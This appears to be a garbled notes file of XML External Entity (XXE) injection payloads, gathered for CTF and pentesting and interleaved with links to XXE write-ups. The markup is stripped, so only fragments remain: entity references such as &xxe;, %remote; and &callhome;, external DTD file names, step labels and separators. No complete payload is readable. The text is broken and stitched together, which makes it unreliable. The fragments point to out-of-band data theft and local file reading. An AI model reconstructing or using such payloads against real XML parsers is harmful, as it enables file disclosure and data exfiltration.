xml

]> &xxe; xml ]> &xxe; CN US %remote;%int;%trick;]> "> ]> ">]> ] [ "]> ]> file.dtd: "> on website: %remote;%int;%trick;]> https://jbz.team/midnightsunctfquals2019/Rubenscube file.xml: "> on website: %remote; %test; %trick; ]> &file CN US random CN US ]> %alpha; %bravo; ]> MAP CN US %alpha; ]> MAP CN US "> ----------------------------------------------------------------------------------------------------------------------------------- %alpha; %bravo; ]> &charlie; CN US "> https://www.synack.com/blog/a-deep-dive-into-xxe-injection/ https://depthsecurity.com/blog/exploitation-xml-external-entity-xxe-injection https://r00thunt.com/2018/10/05/blind-xml-external-entities-out-of-band-channel-vulnerability-paypal-case-study/ https://bookgin.tw/2018/12/04/from-xxe-to-rce-pwn2win-ctf-2018-writeup/ ----------------------------------------------------------------------------------------------------------------------------------- test.dtd "> %alpha; %bravo; %delta; ]> CN US ----------------------------------------------------------------------------------------------------------------------------------- "> %alpha; %bravo; %charlie; %delta; ]> CN US "> %bravo; ]> CN US ----------------------------------------------------------------------------------------------------------------------------------- step 1: payloadallthethingsi ]> &xxe; CN US ----------------------------------------------------------------------------------------------------------------------------------- step 2: https://gist.github.com/staaldraad/01415b990939494879b4 - last comment test.dtdi "> %alpha; %xxe; ]> testing CN US ----------------------------------------------------------------------------------------------------------------------------------- ]> &callhome; CN US ----------------------------------------------------------------------------------------------------------------------------------- test4.dtd "> %dtd; %all; %req; ]> test CN US ----------------------------------------------------------------------------------------------------------------------------------- https://resources.infosecinstitute.com/finding-and-exploiting-xxe-xml-external-entities-injection/#gref %dtd; %all; %req; ]> test CN US ----------------------------------------------------------------------------------------------------------------------------------- https://resources.infosecinstitute.com/finding-and-exploiting-xxe-xml-external-entities-injection/#gref ]> &file; CN US